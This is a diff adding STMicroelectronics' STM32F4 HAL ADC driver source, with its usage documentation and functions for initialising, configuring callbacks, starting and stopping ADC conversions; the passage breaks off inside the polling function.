b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_adc.c @@ -0,0 +1,2109 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_adc.c + * @author MCD Application Team + * @brief This file provides firmware functions to manage the following + * functionalities of the Analog to Digital Converter (ADC) peripheral: + * + Initialization and de-initialization functions + * + IO operation functions + * + State and errors functions + * + @verbatim + ============================================================================== + ##### ADC Peripheral features ##### + ============================================================================== + [..] + (#) 12-bit, 10-bit, 8-bit or 6-bit configurable resolution. + (#) Interrupt generation at the end of conversion, end of injected conversion, + and in case of analog watchdog or overrun events + (#) Single and continuous conversion modes. + (#) Scan mode for automatic conversion of channel 0 to channel x. + (#) Data alignment with in-built data coherency. + (#) Channel-wise programmable sampling time. + (#) External trigger option with configurable polarity for both regular and + injected conversion. + (#) Dual/Triple mode (on devices with 2 ADCs or more). + (#) Configurable DMA data storage in Dual/Triple ADC mode. + (#) Configurable delay between conversions in Dual/Triple interleaved mode. + (#) ADC conversion type (refer to the datasheets). + (#) ADC supply requirements: 2.4 V to 3.6 V at full speed and down to 1.8 V at + slower speed. + (#) ADC input range: VREF(minus) = VIN = VREF(plus). + (#) DMA request generation during regular channel conversion. + + + ##### How to use this driver ##### + ============================================================================== + [..] + (#)Initialize the ADC low level resources by implementing the HAL_ADC_MspInit(): + (##) Enable the ADC interface clock using __HAL_RCC_ADC_CLK_ENABLE() + (##) ADC pins configuration + (+++) Enable the clock for the ADC GPIOs using the following function: + __HAL_RCC_GPIOx_CLK_ENABLE() + (+++) Configure these ADC pins in analog mode using HAL_GPIO_Init() + (##) In case of using interrupts (e.g. HAL_ADC_Start_IT()) + (+++) Configure the ADC interrupt priority using HAL_NVIC_SetPriority() + (+++) Enable the ADC IRQ handler using HAL_NVIC_EnableIRQ() + (+++) In ADC IRQ handler, call HAL_ADC_IRQHandler() + (##) In case of using DMA to control data transfer (e.g. HAL_ADC_Start_DMA()) + (+++) Enable the DMAx interface clock using __HAL_RCC_DMAx_CLK_ENABLE() + (+++) Configure and enable two DMA streams stream for managing data + transfer from peripheral to memory (output stream) + (+++) Associate the initialized DMA handle to the CRYP DMA handle + using __HAL_LINKDMA() + (+++) Configure the priority and enable the NVIC for the transfer complete + interrupt on the two DMA Streams. The output stream should have higher + priority than the input stream. + + *** Configuration of ADC, groups regular/injected, channels parameters *** + ============================================================================== + [..] + (#) Configure the ADC parameters (resolution, data alignment, ...) + and regular group parameters (conversion trigger, sequencer, ...) + using function HAL_ADC_Init(). + + (#) Configure the channels for regular group parameters (channel number, + channel rank into sequencer, ..., into regular group) + using function HAL_ADC_ConfigChannel(). + + (#) Optionally, configure the injected group parameters (conversion trigger, + sequencer, ..., of injected group) + and the channels for injected group parameters (channel number, + channel rank into sequencer, ..., into injected group) + using function HAL_ADCEx_InjectedConfigChannel(). + + (#) Optionally, configure the analog watchdog parameters (channels + monitored, thresholds, ...) using function HAL_ADC_AnalogWDGConfig(). + + (#) Optionally, for devices with several ADC instances: configure the + multimode parameters using function HAL_ADCEx_MultiModeConfigChannel(). + + *** Execution of ADC conversions *** + ============================================================================== + [..] + (#) ADC driver can be used among three modes: polling, interruption, + transfer by DMA. + + *** Polling mode IO operation *** + ================================= + [..] + (+) Start the ADC peripheral using HAL_ADC_Start() + (+) Wait for end of conversion using HAL_ADC_PollForConversion(), at this stage + user can specify the value of timeout according to his end application + (+) To read the ADC converted values, use the HAL_ADC_GetValue() function. + (+) Stop the ADC peripheral using HAL_ADC_Stop() + + *** Interrupt mode IO operation *** + =================================== + [..] + (+) Start the ADC peripheral using HAL_ADC_Start_IT() + (+) Use HAL_ADC_IRQHandler() called under ADC_IRQHandler() Interrupt subroutine + (+) At ADC end of conversion HAL_ADC_ConvCpltCallback() function is executed and user can + add his own code by customization of function pointer HAL_ADC_ConvCpltCallback + (+) In case of ADC Error, HAL_ADC_ErrorCallback() function is executed and user can + add his own code by customization of function pointer HAL_ADC_ErrorCallback + (+) Stop the ADC peripheral using HAL_ADC_Stop_IT() + + *** DMA mode IO operation *** + ============================== + [..] + (+) Start the ADC peripheral using HAL_ADC_Start_DMA(), at this stage the user specify the length + of data to be transferred at each end of conversion + (+) At The end of data transfer by HAL_ADC_ConvCpltCallback() function is executed and user can + add his own code by customization of function pointer HAL_ADC_ConvCpltCallback + (+) In case of transfer Error, HAL_ADC_ErrorCallback() function is executed and user can + add his own code by customization of function pointer HAL_ADC_ErrorCallback + (+) Stop the ADC peripheral using HAL_ADC_Stop_DMA() + + *** ADC HAL driver macros list *** + ============================================= + [..] + Below the list of most used macros in ADC HAL driver. + + (+) __HAL_ADC_ENABLE : Enable the ADC peripheral + (+) __HAL_ADC_DISABLE : Disable the ADC peripheral + (+) __HAL_ADC_ENABLE_IT: Enable the ADC end of conversion interrupt + (+) __HAL_ADC_DISABLE_IT: Disable the ADC end of conversion interrupt + (+) __HAL_ADC_GET_IT_SOURCE: Check if the specified ADC interrupt source is enabled or disabled + (+) __HAL_ADC_CLEAR_FLAG: Clear the ADC's pending flags + (+) __HAL_ADC_GET_FLAG: Get the selected ADC's flag status + (+) ADC_GET_RESOLUTION: Return resolution bits in CR1 register + + [..] + (@) You can refer to the ADC HAL driver header file for more useful macros + + *** Deinitialization of ADC *** + ============================================================================== + [..] + (#) Disable the ADC interface + (++) ADC clock can be hard reset and disabled at RCC top level. + (++) Hard reset of ADC peripherals + using macro __HAL_RCC_ADC_FORCE_RESET(), __HAL_RCC_ADC_RELEASE_RESET(). + (++) ADC clock disable using the equivalent macro/functions as configuration step. + (+++) Example: + Into HAL_ADC_MspDeInit() (recommended code location) or with + other device clock parameters configuration: + (+++) HAL_RCC_GetOscConfig(&RCC_OscInitStructure); + (+++) RCC_OscInitStructure.OscillatorType = RCC_OSCILLATORTYPE_HSI; + (+++) RCC_OscInitStructure.HSIState = RCC_HSI_OFF; (if not used for system clock) + (+++) HAL_RCC_OscConfig(&RCC_OscInitStructure); + + (#) ADC pins configuration + (++) Disable the clock for the ADC GPIOs using macro __HAL_RCC_GPIOx_CLK_DISABLE() + + (#) Optionally, in case of usage of ADC with interruptions: + (++) Disable the NVIC for ADC using function HAL_NVIC_DisableIRQ(ADCx_IRQn) + + (#) Optionally, in case of usage of DMA: + (++) Deinitialize the DMA using function HAL_DMA_DeInit(). + (++) Disable the NVIC for DMA using function HAL_NVIC_DisableIRQ(DMAx_Channelx_IRQn) + *** Callback registration *** + ============================================================================== + [..] + + The compilation flag USE_HAL_ADC_REGISTER_CALLBACKS, when set to 1, + allows the user to configure dynamically the driver callbacks. + Use Functions HAL_ADC_RegisterCallback() + to register an interrupt callback. + [..] + + Function HAL_ADC_RegisterCallback() allows to register following callbacks: + (+) ConvCpltCallback : ADC conversion complete callback + (+) ConvHalfCpltCallback : ADC conversion DMA half-transfer callback + (+) LevelOutOfWindowCallback : ADC analog watchdog 1 callback + (+) ErrorCallback : ADC error callback + (+) InjectedConvCpltCallback : ADC group injected conversion complete callback + (+) InjectedQueueOverflowCallback : ADC group injected context queue overflow callback + (+) LevelOutOfWindow2Callback : ADC analog watchdog 2 callback + (+) LevelOutOfWindow3Callback : ADC analog watchdog 3 callback + (+) EndOfSamplingCallback : ADC end of sampling callback + (+) MspInitCallback : ADC Msp Init callback + (+) MspDeInitCallback : ADC Msp DeInit callback + This function takes as parameters the HAL peripheral handle, the Callback ID + and a pointer to the user callback function. + [..] + + Use function HAL_ADC_UnRegisterCallback to reset a callback to the default + weak function. + [..] + + HAL_ADC_UnRegisterCallback takes as parameters the HAL peripheral handle, + and the Callback ID. + This function allows to reset following callbacks: + (+) ConvCpltCallback : ADC conversion complete callback + (+) ConvHalfCpltCallback : ADC conversion DMA half-transfer callback + (+) LevelOutOfWindowCallback : ADC analog watchdog 1 callback + (+) ErrorCallback : ADC error callback + (+) InjectedConvCpltCallback : ADC group injected conversion complete callback + (+) InjectedQueueOverflowCallback : ADC group injected context queue overflow callback + (+) LevelOutOfWindow2Callback : ADC analog watchdog 2 callback + (+) LevelOutOfWindow3Callback : ADC analog watchdog 3 callback + (+) EndOfSamplingCallback : ADC end of sampling callback + (+) MspInitCallback : ADC Msp Init callback + (+) MspDeInitCallback : ADC Msp DeInit callback + [..] + + By default, after the HAL_ADC_Init() and when the state is HAL_ADC_STATE_RESET + all callbacks are set to the corresponding weak functions: + examples HAL_ADC_ConvCpltCallback(), HAL_ADC_ErrorCallback(). + Exception done for MspInit and MspDeInit functions that are + reset to the legacy weak functions in the HAL_ADC_Init()/ HAL_ADC_DeInit() only when + these callbacks are null (not registered beforehand). + [..] + + If MspInit or MspDeInit are not null, the HAL_ADC_Init()/ HAL_ADC_DeInit() + keep and use the user MspInit/MspDeInit callbacks (registered beforehand) whatever the state. + [..] + + Callbacks can be registered/unregistered in HAL_ADC_STATE_READY state only. + Exception done MspInit/MspDeInit functions that can be registered/unregistered + in HAL_ADC_STATE_READY or HAL_ADC_STATE_RESET state, + thus registered (user) MspInit/DeInit callbacks can be used during the Init/DeInit. + [..] + + Then, the user first registers the MspInit/MspDeInit user callbacks + using HAL_ADC_RegisterCallback() before calling HAL_ADC_DeInit() + or HAL_ADC_Init() function. + [..] + + When the compilation flag USE_HAL_ADC_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registration feature is not available and all callbacks + are set to the corresponding weak functions. + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup ADC ADC + * @brief ADC driver modules + * @{ + */ + +#ifdef HAL_ADC_MODULE_ENABLED + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/** @addtogroup ADC_Private_Functions + * @{ + */ +/* Private function prototypes -----------------------------------------------*/ +static void ADC_Init(ADC_HandleTypeDef* hadc); +static void ADC_DMAConvCplt(DMA_HandleTypeDef *hdma); +static void ADC_DMAError(DMA_HandleTypeDef *hdma); +static void ADC_DMAHalfConvCplt(DMA_HandleTypeDef *hdma); +/** + * @} + */ +/* Exported functions --------------------------------------------------------*/ +/** @defgroup ADC_Exported_Functions ADC Exported Functions + * @{ + */ + +/** @defgroup ADC_Exported_Functions_Group1 Initialization and de-initialization functions + * @brief Initialization and Configuration functions + * +@verbatim + =============================================================================== + ##### Initialization and de-initialization functions ##### + =============================================================================== + [..] This section provides functions allowing to: + (+) Initialize and configure the ADC. + (+) De-initialize the ADC. + +@endverbatim + * @{ + */ + +/** + * @brief Initializes the ADCx peripheral according to the specified parameters + * in the ADC_InitStruct and initializes the ADC MSP. + * + * @note This function is used to configure the global features of the ADC ( + * ClockPrescaler, Resolution, Data Alignment and number of conversion), however, + * the rest of the configuration parameters are specific to the regular + * channels group (scan mode activation, continuous mode activation, + * External trigger source and edge, DMA continuous request after the + * last transfer and End of conversion selection). + * + * @param hadc pointer to a ADC_HandleTypeDef structure that contains + * the configuration information for the specified ADC. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_ADC_Init(ADC_HandleTypeDef* hadc) +{ + HAL_StatusTypeDef tmp_hal_status = HAL_OK; + + /* Check ADC handle */ + if(hadc == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_ADC_ALL_INSTANCE(hadc->Instance)); + assert_param(IS_ADC_CLOCKPRESCALER(hadc->Init.ClockPrescaler)); + assert_param(IS_ADC_RESOLUTION(hadc->Init.Resolution)); + assert_param(IS_FUNCTIONAL_STATE(hadc->Init.ScanConvMode)); + assert_param(IS_FUNCTIONAL_STATE(hadc->Init.ContinuousConvMode)); + assert_param(IS_ADC_EXT_TRIG(hadc->Init.ExternalTrigConv)); + assert_param(IS_ADC_DATA_ALIGN(hadc->Init.DataAlign)); + assert_param(IS_ADC_REGULAR_LENGTH(hadc->Init.NbrOfConversion)); + assert_param(IS_FUNCTIONAL_STATE(hadc->Init.DMAContinuousRequests)); + assert_param(IS_ADC_EOCSelection(hadc->Init.EOCSelection)); + assert_param(IS_FUNCTIONAL_STATE(hadc->Init.DiscontinuousConvMode)); + + if(hadc->Init.ExternalTrigConv != ADC_SOFTWARE_START) + { + assert_param(IS_ADC_EXT_TRIG_EDGE(hadc->Init.ExternalTrigConvEdge)); + } + + if(hadc->State == HAL_ADC_STATE_RESET) + { +#if (USE_HAL_ADC_REGISTER_CALLBACKS == 1) + /* Init the ADC Callback settings */ + hadc->ConvCpltCallback = HAL_ADC_ConvCpltCallback; /* Legacy weak callback */ + hadc->ConvHalfCpltCallback = HAL_ADC_ConvHalfCpltCallback; /* Legacy weak callback */ + hadc->LevelOutOfWindowCallback = HAL_ADC_LevelOutOfWindowCallback; /* Legacy weak callback */ + hadc->ErrorCallback = HAL_ADC_ErrorCallback; /* Legacy weak callback */ + hadc->InjectedConvCpltCallback = HAL_ADCEx_InjectedConvCpltCallback; /* Legacy weak callback */ + if (hadc->MspInitCallback == NULL) + { + hadc->MspInitCallback = HAL_ADC_MspInit; /* Legacy weak MspInit */ + } + + /* Init the low level hardware */ + hadc->MspInitCallback(hadc); +#else + /* Init the low level hardware */ + HAL_ADC_MspInit(hadc); +#endif /* USE_HAL_ADC_REGISTER_CALLBACKS */ + + /* Initialize ADC error code */ + ADC_CLEAR_ERRORCODE(hadc); + + /* Allocate lock resource and initialize it */ + hadc->Lock = HAL_UNLOCKED; + } + + /* Configuration of ADC parameters if previous preliminary actions are */ + /* correctly completed. */ + if (HAL_IS_BIT_CLR(hadc->State, HAL_ADC_STATE_ERROR_INTERNAL)) + { + /* Set ADC state */ + ADC_STATE_CLR_SET(hadc->State, + HAL_ADC_STATE_REG_BUSY | HAL_ADC_STATE_INJ_BUSY, + HAL_ADC_STATE_BUSY_INTERNAL); + + /* Set ADC parameters */ + ADC_Init(hadc); + + /* Set ADC error code to none */ + ADC_CLEAR_ERRORCODE(hadc); + + /* Set the ADC state */ + ADC_STATE_CLR_SET(hadc->State, + HAL_ADC_STATE_BUSY_INTERNAL, + HAL_ADC_STATE_READY); + } + else + { + tmp_hal_status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hadc); + + /* Return function status */ + return tmp_hal_status; +} + +/** + * @brief Deinitializes the ADCx peripheral registers to their default reset values. + * @param hadc pointer to a ADC_HandleTypeDef structure that contains + * the configuration information for the specified ADC. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_ADC_DeInit(ADC_HandleTypeDef* hadc) +{ + HAL_StatusTypeDef tmp_hal_status = HAL_OK; + + /* Check ADC handle */ + if(hadc == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_ADC_ALL_INSTANCE(hadc->Instance)); + + /* Set ADC state */ + SET_BIT(hadc->State, HAL_ADC_STATE_BUSY_INTERNAL); + + /* Stop potential conversion on going, on regular and injected groups */ + /* Disable ADC peripheral */ + __HAL_ADC_DISABLE(hadc); + + /* Configuration of ADC parameters if previous preliminary actions are */ + /* correctly completed. */ + if(HAL_IS_BIT_CLR(hadc->Instance->CR2, ADC_CR2_ADON)) + { +#if (USE_HAL_ADC_REGISTER_CALLBACKS == 1) + if (hadc->MspDeInitCallback == NULL) + { + hadc->MspDeInitCallback = HAL_ADC_MspDeInit; /* Legacy weak MspDeInit */ + } + + /* DeInit the low level hardware: RCC clock, NVIC */ + hadc->MspDeInitCallback(hadc); +#else + /* DeInit the low level hardware: RCC clock, NVIC */ + HAL_ADC_MspDeInit(hadc); +#endif /* USE_HAL_ADC_REGISTER_CALLBACKS */ + + /* Set ADC error code to none */ + ADC_CLEAR_ERRORCODE(hadc); + + /* Set ADC state */ + hadc->State = HAL_ADC_STATE_RESET; + } + + /* Process unlocked */ + __HAL_UNLOCK(hadc); + + /* Return function status */ + return tmp_hal_status; +} + +#if (USE_HAL_ADC_REGISTER_CALLBACKS == 1) +/** + * @brief Register a User ADC Callback + * To be used instead of the weak predefined callback + * @param hadc Pointer to a ADC_HandleTypeDef structure that contains + * the configuration information for the specified ADC. + * @param CallbackID ID of the callback to be registered + * This parameter can be one of the following values: + * @arg @ref HAL_ADC_CONVERSION_COMPLETE_CB_ID ADC conversion complete callback ID + * @arg @ref HAL_ADC_CONVERSION_HALF_CB_ID ADC conversion DMA half-transfer callback ID + * @arg @ref HAL_ADC_LEVEL_OUT_OF_WINDOW_1_CB_ID ADC analog watchdog 1 callback ID + * @arg @ref HAL_ADC_ERROR_CB_ID ADC error callback ID + * @arg @ref HAL_ADC_INJ_CONVERSION_COMPLETE_CB_ID ADC group injected conversion complete callback ID + * @arg @ref HAL_ADC_MSPINIT_CB_ID ADC Msp Init callback ID + * @arg @ref HAL_ADC_MSPDEINIT_CB_ID ADC Msp DeInit callback ID + * @param pCallback pointer to the Callback function + * @retval HAL status + */ +HAL_StatusTypeDef HAL_ADC_RegisterCallback(ADC_HandleTypeDef *hadc, HAL_ADC_CallbackIDTypeDef CallbackID, pADC_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + /* Update the error code */ + hadc->ErrorCode |= HAL_ADC_ERROR_INVALID_CALLBACK; + + return HAL_ERROR; + } + + if ((hadc->State & HAL_ADC_STATE_READY) != 0UL) + { + switch (CallbackID) + { + case HAL_ADC_CONVERSION_COMPLETE_CB_ID : + hadc->ConvCpltCallback = pCallback; + break; + + case HAL_ADC_CONVERSION_HALF_CB_ID : + hadc->ConvHalfCpltCallback = pCallback; + break; + + case HAL_ADC_LEVEL_OUT_OF_WINDOW_1_CB_ID : + hadc->LevelOutOfWindowCallback = pCallback; + break; + + case HAL_ADC_ERROR_CB_ID : + hadc->ErrorCallback = pCallback; + break; + + case HAL_ADC_INJ_CONVERSION_COMPLETE_CB_ID : + hadc->InjectedConvCpltCallback = pCallback; + break; + + case HAL_ADC_MSPINIT_CB_ID : + hadc->MspInitCallback = pCallback; + break; + + case HAL_ADC_MSPDEINIT_CB_ID : + hadc->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + hadc->ErrorCode |= HAL_ADC_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (HAL_ADC_STATE_RESET == hadc->State) + { + switch (CallbackID) + { + case HAL_ADC_MSPINIT_CB_ID : + hadc->MspInitCallback = pCallback; + break; + + case HAL_ADC_MSPDEINIT_CB_ID : + hadc->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + hadc->ErrorCode |= HAL_ADC_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hadc->ErrorCode |= HAL_ADC_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + return status; +} + +/** + * @brief Unregister a ADC Callback + * ADC callback is redirected to the weak predefined callback + * @param hadc Pointer to a ADC_HandleTypeDef structure that contains + * the configuration information for the specified ADC. + * @param CallbackID ID of the callback to be unregistered + * This parameter can be one of the following values: + * @arg @ref HAL_ADC_CONVERSION_COMPLETE_CB_ID ADC conversion complete callback ID + * @arg @ref HAL_ADC_CONVERSION_HALF_CB_ID ADC conversion DMA half-transfer callback ID + * @arg @ref HAL_ADC_LEVEL_OUT_OF_WINDOW_1_CB_ID ADC analog watchdog 1 callback ID + * @arg @ref HAL_ADC_ERROR_CB_ID ADC error callback ID + * @arg @ref HAL_ADC_INJ_CONVERSION_COMPLETE_CB_ID ADC group injected conversion complete callback ID + * @arg @ref HAL_ADC_MSPINIT_CB_ID ADC Msp Init callback ID + * @arg @ref HAL_ADC_MSPDEINIT_CB_ID ADC Msp DeInit callback ID + * @retval HAL status + */ +HAL_StatusTypeDef HAL_ADC_UnRegisterCallback(ADC_HandleTypeDef *hadc, HAL_ADC_CallbackIDTypeDef CallbackID) +{ + HAL_StatusTypeDef status = HAL_OK; + + if ((hadc->State & HAL_ADC_STATE_READY) != 0UL) + { + switch (CallbackID) + { + case HAL_ADC_CONVERSION_COMPLETE_CB_ID : + hadc->ConvCpltCallback = HAL_ADC_ConvCpltCallback; + break; + + case HAL_ADC_CONVERSION_HALF_CB_ID : + hadc->ConvHalfCpltCallback = HAL_ADC_ConvHalfCpltCallback; + break; + + case HAL_ADC_LEVEL_OUT_OF_WINDOW_1_CB_ID : + hadc->LevelOutOfWindowCallback = HAL_ADC_LevelOutOfWindowCallback; + break; + + case HAL_ADC_ERROR_CB_ID : + hadc->ErrorCallback = HAL_ADC_ErrorCallback; + break; + + case HAL_ADC_INJ_CONVERSION_COMPLETE_CB_ID : + hadc->InjectedConvCpltCallback = HAL_ADCEx_InjectedConvCpltCallback; + break; + + case HAL_ADC_MSPINIT_CB_ID : + hadc->MspInitCallback = HAL_ADC_MspInit; /* Legacy weak MspInit */ + break; + + case HAL_ADC_MSPDEINIT_CB_ID : + hadc->MspDeInitCallback = HAL_ADC_MspDeInit; /* Legacy weak MspDeInit */ + break; + + default : + /* Update the error code */ + hadc->ErrorCode |= HAL_ADC_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (HAL_ADC_STATE_RESET == hadc->State) + { + switch (CallbackID) + { + case HAL_ADC_MSPINIT_CB_ID : + hadc->MspInitCallback = HAL_ADC_MspInit; /* Legacy weak MspInit */ + break; + + case HAL_ADC_MSPDEINIT_CB_ID : + hadc->MspDeInitCallback = HAL_ADC_MspDeInit; /* Legacy weak MspDeInit */ + break; + + default : + /* Update the error code */ + hadc->ErrorCode |= HAL_ADC_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hadc->ErrorCode |= HAL_ADC_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + return status; +} + +#endif /* USE_HAL_ADC_REGISTER_CALLBACKS */ + +/** + * @brief Initializes the ADC MSP. + * @param hadc pointer to a ADC_HandleTypeDef structure that contains + * the configuration information for the specified ADC. + * @retval None + */ +__weak void HAL_ADC_MspInit(ADC_HandleTypeDef* hadc) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hadc); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_ADC_MspInit could be implemented in the user file + */ +} + +/** + * @brief DeInitializes the ADC MSP. + * @param hadc pointer to a ADC_HandleTypeDef structure that contains + * the configuration information for the specified ADC. + * @retval None + */ +__weak void HAL_ADC_MspDeInit(ADC_HandleTypeDef* hadc) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hadc); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_ADC_MspDeInit could be implemented in the user file + */ +} + +/** + * @} + */ + +/** @defgroup ADC_Exported_Functions_Group2 IO operation functions + * @brief IO operation functions + * +@verbatim + =============================================================================== + ##### IO operation functions ##### + =============================================================================== + [..] This section provides functions allowing to: + (+) Start conversion of regular channel. + (+) Stop conversion of regular channel. + (+) Start conversion of regular channel and enable interrupt. + (+) Stop conversion of regular channel and disable interrupt. + (+) Start conversion of regular channel and enable DMA transfer. + (+) Stop conversion of regular channel and disable DMA transfer. + (+) Handle ADC interrupt request. + +@endverbatim + * @{ + */ + +/** + * @brief Enables ADC and starts conversion of the regular channels. + * @param hadc pointer to a ADC_HandleTypeDef structure that contains + * the configuration information for the specified ADC. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_ADC_Start(ADC_HandleTypeDef* hadc) +{ + __IO uint32_t counter = 0U; + ADC_Common_TypeDef *tmpADC_Common; + + /* Check the parameters */ + assert_param(IS_FUNCTIONAL_STATE(hadc->Init.ContinuousConvMode)); + assert_param(IS_ADC_EXT_TRIG_EDGE(hadc->Init.ExternalTrigConvEdge)); + + /* Process locked */ + __HAL_LOCK(hadc); + + /* Enable the ADC peripheral */ + /* Check if ADC peripheral is disabled in order to enable it and wait during + Tstab time the ADC's stabilization */ + if((hadc->Instance->CR2 & ADC_CR2_ADON) != ADC_CR2_ADON) + { + /* Enable the Peripheral */ + __HAL_ADC_ENABLE(hadc); + + /* Delay for ADC stabilization time */ + /* Compute number of CPU cycles to wait for */ + counter = (ADC_STAB_DELAY_US * (SystemCoreClock / 1000000U)); + while(counter != 0U) + { + counter--; + } + } + + /* Start conversion if ADC is effectively enabled */ + if(HAL_IS_BIT_SET(hadc->Instance->CR2, ADC_CR2_ADON)) + { + /* Set ADC state */ + /* - Clear state bitfield related to regular group conversion results */ + /* - Set state bitfield related to regular group operation */ + ADC_STATE_CLR_SET(hadc->State, + HAL_ADC_STATE_READY | HAL_ADC_STATE_REG_EOC | HAL_ADC_STATE_REG_OVR, + HAL_ADC_STATE_REG_BUSY); + + /* If conversions on group regular are also triggering group injected, */ + /* update ADC state. */ + if (READ_BIT(hadc->Instance->CR1, ADC_CR1_JAUTO) != RESET) + { + ADC_STATE_CLR_SET(hadc->State, HAL_ADC_STATE_INJ_EOC, HAL_ADC_STATE_INJ_BUSY); + } + + /* State machine update: Check if an injected conversion is ongoing */ + if (HAL_IS_BIT_SET(hadc->State, HAL_ADC_STATE_INJ_BUSY)) + { + /* Reset ADC error code fields related to conversions on group regular */ + CLEAR_BIT(hadc->ErrorCode, (HAL_ADC_ERROR_OVR | HAL_ADC_ERROR_DMA)); + } + else + { + /* Reset ADC all error code fields */ + ADC_CLEAR_ERRORCODE(hadc); + } + + /* Process unlocked */ + /* Unlock before starting ADC conversions: in case of potential */ + /* interruption, to let the process to ADC IRQ Handler. */ + __HAL_UNLOCK(hadc); + + /* Pointer to the common control register to which is belonging hadc */ + /* (Depending on STM32F4 product, there may be up to 3 ADCs and 1 common */ + /* control register) */ + tmpADC_Common = ADC_COMMON_REGISTER(hadc); + + /* Clear regular group conversion flag and overrun flag */ + /* (To ensure of no unknown state from potential previous ADC operations) */ + __HAL_ADC_CLEAR_FLAG(hadc, ADC_FLAG_EOC | ADC_FLAG_OVR); + + /* Check if Multimode enabled */ + if(HAL_IS_BIT_CLR(tmpADC_Common->CCR, ADC_CCR_MULTI)) + { +#if defined(ADC2) && defined(ADC3) + if((hadc->Instance == ADC1) || ((hadc->Instance == ADC2) && ((ADC->CCR & ADC_CCR_MULTI_Msk) < ADC_CCR_MULTI_0)) \ + || ((hadc->Instance == ADC3) && ((ADC->CCR & ADC_CCR_MULTI_Msk) < ADC_CCR_MULTI_4))) + { +#endif /* ADC2 || ADC3 */ + /* if no external trigger present enable software conversion of regular channels */ + if((hadc->Instance->CR2 & ADC_CR2_EXTEN) == RESET) + { + /* Enable the selected ADC software conversion for regular group */ + hadc->Instance->CR2 |= (uint32_t)ADC_CR2_SWSTART; + } +#if defined(ADC2) && defined(ADC3) + } +#endif /* ADC2 || ADC3 */ + } + else + { + /* if instance of handle correspond to ADC1 and no external trigger present enable software conversion of regular channels */ + if((hadc->Instance == ADC1) && ((hadc->Instance->CR2 & ADC_CR2_EXTEN) == RESET)) + { + /* Enable the selected ADC software conversion for regular group */ + hadc->Instance->CR2 |= (uint32_t)ADC_CR2_SWSTART; + } + } + } + else + { + /* Update ADC state machine to error */ + SET_BIT(hadc->State, HAL_ADC_STATE_ERROR_INTERNAL); + + /* Set ADC error code to ADC IP internal error */ + SET_BIT(hadc->ErrorCode, HAL_ADC_ERROR_INTERNAL); + } + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Disables ADC and stop conversion of regular channels. + * + * @note Caution: This function will stop also injected channels. + * + * @param hadc pointer to a ADC_HandleTypeDef structure that contains + * the configuration information for the specified ADC. + * + * @retval HAL status. + */ +HAL_StatusTypeDef HAL_ADC_Stop(ADC_HandleTypeDef* hadc) +{ + /* Check the parameters */ + assert_param(IS_ADC_ALL_INSTANCE(hadc->Instance)); + + /* Process locked */ + __HAL_LOCK(hadc); + + /* Stop potential conversion on going, on regular and injected groups */ + /* Disable ADC peripheral */ + __HAL_ADC_DISABLE(hadc); + + /* Check if ADC is effectively disabled */ + if(HAL_IS_BIT_CLR(hadc->Instance->CR2, ADC_CR2_ADON)) + { + /* Set ADC state */ + ADC_STATE_CLR_SET(hadc->State, + HAL_ADC_STATE_REG_BUSY | HAL_ADC_STATE_INJ_BUSY, + HAL_ADC_STATE_READY); + } + + /* Process unlocked */ + __HAL_UNLOCK(hadc); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Poll for regular conversion complete + * @note ADC conversion flags EOS (end of sequence) and EOC (end of + * conversion) are cleared by this function. + * @note This function cannot be used in a particular setup: ADC configured + * in DMA mode and polling for end of each conversion (ADC init + * parameter "EOCSelection" set to ADC_EOC_SINGLE_CONV). + * In this case, DMA resets the flag EOC and polling cannot be + * performed on each conversion. Nevertheless, polling can still + * be performed on the complete sequence. + * @param hadc pointer to a ADC_HandleTypeDef structure that contains + * the configuration information for the specified ADC. + * @param Timeout Timeout value in millisecond. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_ADC_PollForConversion(ADC_HandleTypeDef* hadc, uint32_t Timeout) +{ + uint32_t tickstart = 0U; + + /* Verification that ADC configuration is compliant with polling for */ + /* each conversion: */ + /* Particular case is ADC configured in DMA mode and ADC sequencer with */ + /* several ranks and polling for end of each conversion. */ + /* For code simplicity sake, this particular case is generalized to */ + /* ADC configured in DMA mode and polling for end of each conversion. */ + if (HAL_IS_BIT_SET(hadc->Instance->CR2, ADC_CR2_EOCS) && + HAL_IS_BIT_SET(hadc->Instance->CR2, ADC_CR2_DMA) ) + { + /* Update ADC state machine to error */ + SET_BIT(hadc->State, 